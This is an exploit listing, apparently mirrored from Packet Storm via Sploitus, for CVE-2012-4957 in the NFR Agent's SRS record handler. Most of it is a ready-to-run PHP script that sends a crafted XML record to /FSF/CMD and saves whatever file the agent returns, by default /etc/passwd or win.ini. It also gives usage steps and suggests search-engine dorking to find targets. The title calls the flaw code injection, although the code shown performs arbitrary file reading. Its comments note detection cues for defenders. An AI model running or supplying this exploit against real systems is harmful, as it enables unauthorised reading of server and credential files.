## https://sploitus.com/exploit?id=PACKETSTORM:215625
=============================================================================================================================================
    | # Title     : NFR Agent SRS Record 1.0.4.3 PHP Code Injection Vulnerability                                                               |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://documentation.n-able.com/remote-management/userguide/Content/agentreleasenotes.htm                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or other search engines.
    
    [+] Code Description: This code is written in PHP and aims to exploit a vulnerability in the NFR Agent to retrieve any file from the targeted server.
    	
    	( https://packetstorm.news/files/id/181031/	CVE-2012-4957 )
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 49
    
    [+] Usage : php poc.php 
    
    [+] Payload :
    
    <?php
    
    /**
     * PoC client for CVE-2012-4957: sends one SRS "read file" record to the
     * agent's /FSF/CMD endpoint and stores whatever the agent answers locally.
     *
     * Defender's view: the request is a plain POST with Content-Type text/xml
     * whose body is a 32-character upper-case hex string immediately followed by
     * <RECORD><NAME>SRS</NAME>...</RECORD>. The hex prefix is an MD5 over the
     * record and two string constants that are visible in this script, so it
     * carries no secret and cannot act as authentication. That fixed body shape
     * (and the /FSF/CMD path) is what to look for in web-server logs or IDS rules.
     */
    class NFRFileRetriever {
        private $host;        // agent host name or IP address
        private $port;        // agent TCP port (3037 unless overridden)
        private $ssl;         // true => "https" scheme, false => "http"
        private $remoteFile;  // value placed in <PATH>; also the basis of the local output file name
    
        /**
         * @param string      $host       agent host name or IP address
         * @param int         $port       agent port, default 3037
         * @param bool        $ssl        use https (default) or plain http
         * @param string|null $remoteFile path to request; when null (or any falsy
         *                                value) a default is chosen from the PHP_OS
         *                                of the machine running this script, not
         *                                from anything known about the target
         */
        public function __construct($host, $port = 3037, $ssl = true, $remoteFile = null) {
            $this->host = $host;
            $this->port = $port;
            $this->ssl = $ssl;
            // `?:` tests truthiness, so '' and '0' also fall through to the default.
            $this->remoteFile = $remoteFile ?: (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN' ? 'C:\\Windows\\win.ini' : '/etc/passwd');
        }
    
        /**
         * Builds the wire message: strtoupper(md5("SRS" . record . "SERVER"))
         * directly followed by the record XML, with no separator between them.
         *
         * The <PATH> value is concatenated into the XML without any escaping.
         * Every input to the hash is either in the message itself or a literal in
         * this source, so the prefix is at most an integrity tag, never an
         * authentication token.
         *
         * @return string
         */
        private function generateMessage() {
            $record = "<RECORD><NAME>SRS</NAME><OPERATION>4</OPERATION><CMD>103</CMD><PATH>" . $this->remoteFile . "</PATH></RECORD>";
            $md5 = strtoupper(md5("SRS" . $record . "SERVER"));
            return $md5 . $record;
        }
    
        /**
         * POSTs the message to {scheme}://host:port/FSF/CMD and, when the reply
         * is non-empty and does not contain "<RESULT>", writes the raw reply to a
         * file named basename($this->remoteFile) in the current working directory.
         *
         * Notes:
         * - file_get_contents() yields false on transport failure; because the
         *   test below is a truthiness test, a reply of "" or "0" is also reported
         *   as a failure.
         * - A reply containing "<RESULT>" is presumably the agent's status/error
         *   answer rather than file content (inferred from the check, not verified).
         * - The reply is written to disk as-is, without any inspection of its content.
         *
         * @return void
         */
        public function retrieveFile() {
            $url = ($this->ssl ? "https" : "http") . "://" . $this->host . ":" . $this->port . "/FSF/CMD";
            
            $message = $this->generateMessage();
    
            // Stream-context POST; body is the hash-prefixed XML record above.
            $options = [
                'http' => [
                    'header'  => "Content-Type: text/xml\r\n",
                    'method'  => 'POST',
                    'content' => $message
                ]
            ];
            
            $context = stream_context_create($options);
            $response = file_get_contents($url, false, $context);
            
            if ($response && strpos($response, "<RESULT>") === false) {
                // Only the last path component is used, so the output lands in the cwd.
                $fileName = basename($this->remoteFile);
                file_put_contents($fileName, $response);
                echo "[+] " . $this->remoteFile . " saved as " . $fileName . "\n";
            } else {
                echo "[-] Failed to retrieve the file contents\n";
            }
        }
    }
    
    // Usage example: the host is the only required argument; port 3037, https
    // and the PHP_OS-dependent default path come from the constructor defaults.
    $retriever = new NFRFileRetriever('target_ip');
    $retriever->retrieveFile();
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================